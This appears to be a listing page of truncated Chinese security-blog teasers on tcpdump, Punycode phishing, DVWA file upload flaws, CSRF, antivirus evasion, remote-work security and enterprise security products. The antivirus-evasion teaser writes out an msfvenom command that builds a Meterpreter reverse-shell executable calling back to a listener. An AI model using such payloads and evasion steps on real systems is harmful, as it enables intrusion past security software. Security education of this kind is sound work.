tcpdump采用命令行方式对接口的数据包进行筛选抓取，其丰富特性表现在灵活的表达式上。 不带任何选项的tcpdump，默认会抓取第一个网络接口，且只有将tcpdump进程终止才会停止抓包。例如： shell> tcpdump -nn -i eth0 icmp 下面是详细的tcpdump用法。 1.1 tcpdump选项 它的……

0x01 Punycode钓鱼攻击 1.1什么是网络钓鱼？ 网络钓鱼（Phishing，与钓鱼的英语fishing发音相近，又名钓鱼法或钓鱼式攻击）是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感信息（如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息）的一种攻击方式。 攻击者利……

File Upload（文件上传）漏洞： 由于对用户上传文件的类型、内容没有进行严格的审查，使得攻击者可以通过上传含有执行脚本的木马文件操纵服务器，因此文件上传漏洞带来的危害常常是毁灭性的。 low级别： <?phpif( isset( $_POST[ ‘Upload’ ] ) ) {// W……

CSRF跨站点请求伪造(Cross—Site Request Forgery)： 跟XSS攻击一样，存在巨大的危害性，你可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、……

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件：360安全卫士 在线杀毒：VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe 原始生成后，完全被查杀 VT查杀55/69 0x03 编码处理 这里使用msf自带的编码器进……

受新型冠状病毒肺炎疫情的影响，多个省市出台规定宣布推迟复工时间，在家远程办公模式成为了众多单位的选择。 远程办公模式在为我们提供方便的同时，也带来了一些问题，安全性就是影响远程办公的重要因素之一。非专用的办公设备、非专用的网络环境，大规模人员的远程办公带来的安全风险成为我们急需关注和解决的……

早几年里，企业的安全运营人员面对机房里的资产管理还能从容应对。如今，如果对资产管理的重视程度和运营方式还停留在以前的水平，迟早会成为黑客的下一个目标。 在网络安全建设的过程中，资产梳理和漏洞运营作为其中的关键环节，常常遇到诸多挑战。 由于内部信息化业务发展迅速，云资产剧增，企业内……

2020年8月19日，第八届互联网安全大会（ISC2020）的安全服务论坛圆满举行。 作为全球网络安全圈的最大盛会之一，ISC大会已举办过14场国际安全领袖峰会，展开超过100次的顶级安全智库对话，已成为全球性的网络安全发展趋势风向标。 安全狗作为国内最早引入云工作负载安全（CWPP）概念，并成功构建相应产品线的专业……

近年来，随着云计算、人工智能、物联网、5G等新技术新起，企业数字化转型使业务暴露范围急剧增加，伴随着黑色产业链向专业化、规模化、智能化方向快速发展，各行各业面临着更多未知的信息安全风险。目前，国内多数用户处于“泛主机”场景，即传统主机环境+内部私有云环境+公有云环境+容器环境(根据业务情况)。笔者将这样的……

网络隔离并不是新的概念，而微隔离技术（Micro-Segmentation）是VMware在应对虚拟化隔离技术时提出来的，但真正让微隔离备受大家关注是从2016年起连续3年微隔离技术都进入Gartner年度安全技术榜单开始。在2016年的Gartner安全与风险管理峰会上， Gartner副总裁、知名分析师Neil MacDonald提出了微隔离技术的概念。“……